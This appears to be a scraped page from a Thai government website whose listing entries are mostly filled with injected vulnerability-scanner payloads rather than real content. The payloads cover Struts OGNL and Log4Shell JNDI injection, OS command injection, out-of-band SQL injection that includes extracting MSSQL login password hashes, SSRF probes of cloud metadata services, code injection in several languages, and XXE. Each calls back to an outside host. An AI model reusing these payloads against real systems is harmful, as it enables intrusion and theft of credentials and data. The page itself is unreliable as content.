find_in_page    (09 กันยายน 2565)
find_in_page    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.op (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.op (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    |nslookup${IFS}"ntlypzcbsmqpbztnctv99y4zd147b1dov1wrpjqf""jqs.r87.me" (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    "&nslookup "ntlypzcbsm9k1nq_bxwazqf5yyuwfsd2xt23ido5""mmi.r87.me" (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    '&nslookup "ntlypzcbsmsqubz3vqxenj6erccob9ctrv_zuw0m""o0a.r87.me" (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    &nslookup "ntlypzcbsm3tkophy3zkrb6_oxm4zstsdoi9l1jv""nva.r87.me" (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    nslookup "ntlypzcbsmqd9nnw_26whyigmidi76_jk-jb3fzq""k0i.r87.me" (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    "& nslookup ntlypzcbsmqs5nhraamcf-_uxyjr8clrovfdkoqs^xsm.r87.me&'\"`0&nslookup ntlypzcbsmqs5nhraamcf-_uxyjr8clrovfdkoqs^xsm.r87.me&`' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    '& nslookup ntlypzcbsmxlmk7sqgzzgbuuqdwm-gpcelfvhfob^nwa.r87.me&'\"`0&nslookup ntlypzcbsmxlmk7sqgzzgbuuqdwm-gpcelfvhfob^nwa.r87.me&`' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    & nslookup ntlypzcbsmmcibpf8xeqay-xzlsw7budusuwpvi7^ra8.r87.me&'\"`0&nslookup ntlypzcbsmmcibpf8xeqay-xzlsw7budusuwpvi7^ra8.r87.me&`' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    nslookup ntlypzcbsmgsys4-9mk35akruzsgptj5li1mwwzw^z0e.r87.me&'\"`0&nslookup ntlypzcbsmgsys4-9mk35akruzsgptj5li1mwwzw^z0e.r87.me&`' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    "+gethostbyname(lc 'ntlypzcbsmdjl2tfqcujf5ss1gukupcr5don5p8a'.'ovi.r87.me')+" (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    '+gethostbyname(lc 'ntlypzcbsme-jpxkvvg2-rqdygchyewz1vywbfjd'.'scc.r87.me')+' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    eval('gethostbyname(lc 'ntlypzcbsmwrja9gaxgek6i9x2isfrkt0l3oxp4n'.'ai0.r87.me')') (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    gethostbyname(lc 'ntlypzcbsmfa2kyk_h1owssdbmhpcql45dxeckry'.'xmm.r87.me') (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    "+createobject("WScript.Shell").exec("nslookup ntlypzcbsmokfah-m2haowspr-hjpsbpn6_e96uy" & "hts.r87.me").StdOut.ReadAll+" (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    <%createobject("WScript.Shell").exec("nslookup ntlypzcbsmgz307p8ypy95nio-dxd6ecyxq2wg1n" & "tke.r87.me").StdOut.ReadAll%> (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    +createobject("WScript.Shell").exec("nslookup ntlypzcbsmca67026rpbqe-hownfof6prvdafkyf" & "zz4.r87.me").StdOut.ReadAll+ (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    +createobject("WScript.Shell").exec("nslookup ntlypzcbsmpzkydcnbgyi_37gvq8dzkct4vziy7l" & "rku.r87.me").StdOut.ReadAll (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    createobject("WScript.Shell").exec("nslookup ntlypzcbsmgjj-tp1of6ehrqrpps2np_n2oeh5li" & "zzy.r87.me").StdOut.ReadAll (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    '{${gethostbyname(trim('ntlypzcbsmm2nwroxz3x6xyid7wcqlf-q6rnb8qf'.'vec.r87.me'))}}' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    "+gethostbyname(trim('ntlypzcbsmpzn6cgag1g9xhhkmajsytceijukugd'.'wxy.r87.me'))+" (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    '+gethostbyname(trim('ntlypzcbsmimuchrsd9qcxadzszvujahcb5ukxov'.'zuc.r87.me'))+' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    +gethostbyname(trim('ntlypzcbsmhdwrkbairvvfydkl1a7axnhqc1ve9e'.'sy4.r87.me'));// (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    gethostbyname(trim('ntlypzcbsmwedwltmajjq7wcxgdkswsjg45ctjkk'.'hfo.r87.me')); (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    gethostbyname(trim('ntlypzcbsmmqg2p690trzibqfkvtecf8heorw3wz'.'oz4.r87.me')) (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    https://metadata.packet.net/metadata (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    http://169.254.169.254/opc/v1/instance (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    https://www.cots.go.th/server-status (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    http://[::1]:3306 (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    http://103.233.192.230:3306 (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    http://127.0.0.1:3306 (09 กันยายน 2565)
find_in_page    http://[::1]:22 (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    http://103.233.192.230:22 (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    http://127.0.0.1:22 (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    http://169.254.169.254/latest/meta-data/public-hostname (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    http://aws.r87.me/latest/meta-data/public-hostname (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    [::1]/elmah (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    127.0.0.1/elmah (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    127.100.11.2/elmah (09 กันยายน 2565)
find_in_page    '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(110)||chr(116)||chr(108)||chr(121)||chr(112)||chr(122)||chr(99)||chr(98)||chr(115)||chr(109)||chr(104)||chr(103)||chr(106)||chr(105)|| (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    103.233.192.230/elmah (09 กันยายน 2565)
find_in_page    (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(110)||chr(116)||chr(108)||chr(121)||chr(112)||chr(122)||chr(99)||chr(98)||chr(115)||chr(109)||chr(121)||chr(120)||chr(50)||chr(10 (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    www.cots.go.th/elmah (09 กันยายน 2565)
find_in_page    (select UTL_INADDR.GET_HOST_ADDRESS(chr(110)||chr(116)||chr(108)||chr(121)||chr(112)||chr(122)||chr(99)||chr(98)||chr(115)||chr(109)||chr(107)||chr(48)||chr(56)||chr(112)||chr(56)||chr(117)||chr(100)| (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    https://www.cots.go.th/elmah (09 กันยายน 2565)
find_in_page    '||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('ntlypzcbsmwubr3uh-wwbxinv6c7gjmypdqssmgb'||'66s.r87.me') from DUAL))||' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    [::1]/elmah.axd (09 กันยายน 2565)
find_in_page    (length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('ntlypzcbsmp-tgchkc1tb2n9neqbuxv1cbhhwyjb'||'ugy.r87.me') from DUAL)))) (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    127.0.0.1/elmah.axd (09 กันยายน 2565)
find_in_page    (select UTL_INADDR.GET_HOST_ADDRESS('ntlypzcbsm_fbubaq3xlnikrvvlb1yoeevkfws6p'||'vgy.r87.me') from DUAL) (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    127.100.11.2/elmah.axd (09 กันยายน 2565)
find_in_page    '||(SELECT dblink_connect('host=ntlypzcbsm3ylocwh5f_u_ihgenlwecbvhmawkee'||'ywe.r87.me user=a password=a connect_timeout=2'))||' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    103.233.192.230/elmah.axd (09 กันยายน 2565)
find_in_page    cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(110)||chr(116)||chr(108)||chr(121)||chr(112)||chr(122)||chr(99)||chr(98)||chr(115)||chr(109)||chr(98)||chr(106)||chr(12 (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    www.cots.go.th/elmah.axd (09 กันยายน 2565)
find_in_page    cast((SELECT dblink_connect('host=ntlypzcbsmhkur5sg7igt590w73ws4lzirml238i'||'fqo.r87.me user=a password=a connect_timeout=2')) as numeric) (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    https://www.cots.go.th/elmah.axd (09 กันยายน 2565)
find_in_page    dblink_connect('host=ntlypzcbsmsv2laklfo0hqmf6ehfzq30avr8pxaq'||'oo0.r87.me user=a password=a connect_timeout=2') (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    [::1]/trace.axd (09 กันยายน 2565)
find_in_page    SELECT dblink_connect('host=ntlypzcbsmgiahgoqdp7eo19khkjc9sk29sfj7qr'||'_se.r87.me user=a password=a connect_timeout=2') (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    127.0.0.1/trace.axd (09 กันยายน 2565)
find_in_page    -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ntlypzcbsm-kmfgtisr5hal9hp5hfwotikae3jlg'+'uwi.r87.me (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    127.100.11.2/trace.axd (09 กันยายน 2565)
find_in_page    1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ntlypzcbsmevheoruunev8coka-tnf9t4ivn_8nc'+'rm0.r87.me') (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    103.233.192.230/trace.axd (09 กันยายน 2565)
find_in_page    DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','ntlypzcbsmy16bghwtkwhrxaoiusawcex3xvtlmp'+'tyi.r87.me')ex (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    www.cots.go.th/trace.axd (09 กันยายน 2565)
find_in_page    syscolumns WHERE 2>3;exec('xp_dirtree ''\\ntlypzcbsmu_ansbvptjiov1bft6vlapyfigbljx'+'2jc.r87.me'+'\c$\a''')-- (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    https://www.cots.go.th/trace.axd (09 กันยายน 2565)
find_in_page    1'))exec('xp_dirtree ''\\ntlypzcbsmw7kt4zxdxr_q8mh3_eleqe8jxmse43'+'hdi.r87.me'+'\c$\a''')-- (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    1))exec('xp_dirtree ''\\ntlypzcbsm3qsiaxnxlc3kzhixr6h5tgahguyued'+'93c.r87.me'+'\c$\a''')-- (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    1')exec('xp_dirtree ''\\ntlypzcbsmdewatbmzehrkxgkm4jxtgobf3eqqpa'+'rdg.r87.me'+'\c$\a''')-- (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    1) exec('xp_dirtree ''\\ntlypzcbsmjcyleirw2os7gh9t9o5p9jtezxqbox'+'hws.r87.me'+'\c$\a''')-- (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    -1';exec('xp_dirtree ''\\ntlypzcbsm7gxxf25oedfhbeuzblrgp1c-eszapf'+'_j4.r87.me'+'\c$\a''')-- (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    1;exec('xp_dirtree ''\\ntlypzcbsm8joyv3z9wqmi8-xcoc_trnsxldykqi'+'4gi.r87.me'+'\c$\a''')-- (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.ntlypzcbsmxhbcssyj3gk-pacj_r30pzk7qfi1ze'+'ke8.r87.me' from sys.sql_logins WHERE (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    exec('xp_dirtree ''\\ntlypzcbsm79ymza8nusajynbrzc8qmuugheen_s'+'tas.r87.me'+'\c$\a''') (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    __import__('os').popen(('SET /A 268409241 - {0}').format('87324')).read() (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    __import__('os').popen(('expr 268409241 - {0}').format('89400')).read() (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    p "#{0xFFF9999.to_i-`echo 42126`.to_i}" (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    ${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://ntlypz${lower:c}bsmqrwv1-lmyav8ki-cppurvzqkbincj_q4q.r87.me} (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-86023)} (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    ${j${env:bmV0c3Bhcmtlcg:-n}di:dns://ntlypzc${lower:b}smj3el53cftgvrat6tvsqetdngewiuq6tms.r87.me} (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    arguments[1].end(require('child_process').execSync('set /A 268409241 - 92929')) (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    ${jndi:dns://ntlypzcbsm98uugtlpflu7fr${lower:o}jbf1pkjgcjkpwwsmc8.r87.me} (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    arguments[1].end(require('child_process').execSync('expr 268409241 - 88174')) (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    ntlypzcbsmquukjet5ddnof5d_hvywljrgskwrd-phn.r87.me/p/ (09 กันยายน 2565)
find_in_page    "+print localtime()*0+0xFFF9999-66359+" (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    php://filter//resource=http://ntlypzcbsmb4umgv5kkak6jay3vupcbnalgg4snsvnd.r87.me/p/ (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    '+print localtime()*0+0xFFF9999-24567+' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    eval('print localtime()*0+0xFFF9999-15644') (09 กันยายน 2565)
find_in_page    http://ntlypzcbsmhzq6bswhbyalnffaxer53avueu6mwrxs7.r87.me/p/ (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    print localtime()*0+0xFFF9999-39600 (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    3 (09 กันยายน 2565)
find_in_page    3 (09 กันยายน 2565)
find_in_page    3 (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    [php]print(int)0xFFF9999-7665;[/php] (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    '{${print(int)0xFFF9999-75093}}' (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    {php}print(int)0xFFF9999-5540;{/php} (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
'>
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    ntlypzcbsmg2_9c695f12lzpyepoehymexfkkarzmnq.r87.me (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
'>
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    NS09?s1?DBL?SNGL?NS09 (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    &thisdoesntexists; (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    ]>&lfi; (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    {{ 268409241- 71733 }} (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    ]>&lfi; (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (268409241-63837) (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    (09 กันยายน 2565)
find_in_page    {{ 268409241- 93339 }} (09 กันยายน 2565)